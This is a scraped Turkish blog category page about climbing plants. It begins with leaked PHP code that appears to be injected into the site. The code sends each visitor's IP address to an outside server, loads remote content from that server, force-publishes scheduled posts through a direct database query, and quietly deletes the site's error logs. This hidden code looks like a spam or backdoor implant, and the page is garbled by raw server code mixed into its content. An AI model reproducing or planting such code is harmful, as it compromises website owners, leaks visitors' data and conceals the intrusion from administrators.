$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> Botaik Bahçe | Teknoloji Haberleri

Botaik Bahçe kategorisindeki tüm yazılar

Son Yazılar

Tırmanıcı Bitkiler

Tırmanıcı Bitkiler sarmaşıkgiller ailesinden kökleri tıpta kullanılan bitki türleridir. Tırmanıcı bitkilerin oldukça fazla çeşidi vardır. Ülkemizde  de birbirinden farklı renkli ve değişik çeşitlerde tırmanıcı bitkiye rastlamak mümkündür. Aynı zamanda da tırmanıcı bitkilerin her bir çeşidi farklı farklı yapılara ve özelliklere sahiptirler. Tırmanıcı Bitkiler ‘e örnek verecek olursak